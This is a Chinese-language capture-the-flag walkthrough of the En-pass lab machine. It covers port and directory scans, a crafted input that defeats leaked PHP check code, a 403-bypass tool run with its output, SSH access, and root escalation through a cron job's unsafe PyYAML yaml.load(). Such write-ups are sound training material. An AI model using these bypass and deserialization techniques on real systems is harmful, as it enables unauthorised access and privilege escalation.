Skip to main content

En-pass

端口扫描

root@ip-10-10-182-177:~/enpass# nmap -sTCV -p 22,8001 --min-rate 1000 10.10.52.141

Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-04 11:40 BST
Nmap scan report for ip-10-10-52-141.eu-west-1.compute.internal (10.10.52.141)
Host is up (0.00010s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:bf:6b:1e:93:71:7c:99:04:59:d3:8d:81:04:af:46 (RSA)
|   256 40:fd:0c:fc:0b:a8:f5:2d:b1:2e:34:81:e5:c7:a5:91 (ECDSA)
|_  256 7b:39:97:f0:6c:8a:ba:38:5f:48:7b:cc:da:72:a8:44 (EdDSA)
8001/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: En-Pass
MAC Address: 02:17:CA:F8:27:BB (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80

root@ip-10-10-182-177:~/enpass# gobuster dir -u http://10.10.52.141:8001/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt  -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.52.141:8001/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,html
[+] Timeout:        10s
===============================================================
2023/10/04 11:41:24 Starting gobuster
===============================================================
/web (Status: 301)     # 没有权限访问
/index.html (Status: 200)
/reg.php (Status: 200)
/403.php (Status: 403)
/zip (Status: 301)
/server-status (Status: 403)
===============================================================
2023/10/04 11:49:03 Finished
===============================================================

访问 reg.php 页面我发现其源代码中泄露了后端代码

<?php
if($_SERVER["REQUEST_METHOD"] == "POST"){
   $title = $_POST["title"];
   if (!preg_match('/[a-zA-Z0-9]/i' , $title )){
          $val = explode(",",$title);
          $sum = 0;
          for($i = 0 ; $i < 9; $i++){
                if ( (strlen($val[0]) == 2) and (strlen($val[8]) ==  3 ))  {
                    if ( $val[5] !=$val[8]  and $val[3]!=$val[7] ) 
                        $sum = $sum+ (bool)$val[$i]."<br>"; 
                }
          }
          if ( ($sum) == 9 ){
              echo $result;//do not worry you'll get what you need.
              echo " Congo You Got It !! Nice ";
            }
                    else{
                      echo "  Try Try!!";
                    }
          }
          else{
            echo "  Try Again!! ";
          }    
  }
?>

对上述代码询问 GPT 并进行简单分析后创建出了如下 pyload

!@,#$,%^,&,*,(,),-,+-*

当我们输入之后告诉我们一个密码, 我猜测这个密码可能是某个账号或者一些文件的密码

image-20240709171920123

因为之前目录扫描的时候对于 web 目录没有权限访问, 所以我深入扫描发现了一个文件, 访问新发现的文件, 我获取到了一个 SSH

image-20240709171927356

所以我猜测之前得到的密码其实就是 SSH 私钥的密码, 进行验证

image-20240709171934184

现在我们有了 SSH 的私钥但是没有用户名, 此时我将目录放到了 zip 目录下, 其下存在很多压缩文件, 我本来想的是其中应该有一些隐藏文件, 结果里面全部都是一个单词 sadman 只能另寻他法, 看了提示后告诉我们需要绕过 403 这里的 403 只有一个那就是 403.php 文件, 所以我寻找了一些工具来帮助进行操作 Bypass-403

root@ip-10-10-182-177:~/enpass/bypass-403# ./bypass-403.sh http://10.10.52.141:8001/403.php
 ____                                  _  _    ___ _____ 
| __ ) _   _ _ __   __ _ ___ ___      | || |  / _ \___ / 
|  _ \| | | | '_ \ / _` / __/ __|_____| || |_| | | ||_ \ 
| |_) | |_| | |_) | (_| \__ \__ \_____|__   _| |_| |__) |
|____/ \__, | .__/ \__,_|___/___/        |_|  \___/____/ 
       |___/|_|                                          
                                               By Iam_J0ker
./bypass-403.sh https://example.com path
 
.......
403,1123  --> http://10.10.52.141:8001/403.php/ -H X-Host: 127.0.0.1
200,917  --> http://10.10.52.141:8001/403.php/..;/
000,0  --> http://10.10.52.141:8001/403.php/;/
.....

在输出中我们可以发现一个 200 , 访问它发现一个单词估计就是我们的用户

image-20240709172005967

后渗透

imsau

利用得到的密钥进行登陆

image-20240709172021644

imsau —> root

在系统中搜寻时, 我发现 opt 下有一个属于 root 的 scripts 文件并且其中存在一个 py 脚本, 因此我猜测有定时任务

imsau@enpass:/opt/scripts$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Jan 31  2021 .
drwxr-xr-x 3 root root 4096 Jan 31  2021 ..
-r-xr-xr-x 1 root root  250 Jan 31  2021 file.py
imsau@enpass:/opt/scripts$ cat file.py 
#!/usr/bin/python
import yaml

class Execute():
	def __init__(self,file_name ="/tmp/file.yml"):
		self.file_name = file_name
		self.read_file = open(file_name ,"r")

	def run(self):
		return self.read_file.read()

data  = yaml.load(Execute().run())

上传 pspy 直接监视发现确实存在 root 进程, 并且其会将 /tmp/file.yml 文件删除

image-20240709172032020

将代码交给 GPT 后, 其告诉我对于 PyYAML < 5.1 的版本 yaml.load() 是存在漏洞的, 接着我查看了本地的版本

image-20240709172037244

因此我开始了谷歌寻找发现一个利用的脚本 python-deserialization-attack-payload-generator

直接生成利用然后上传到目标端

image-20240709172046377

其实我们只要等待片刻, 只有 tmp 目录下的 file.yml 文件一消失我们就可以判定执行成功

image-20240709172052402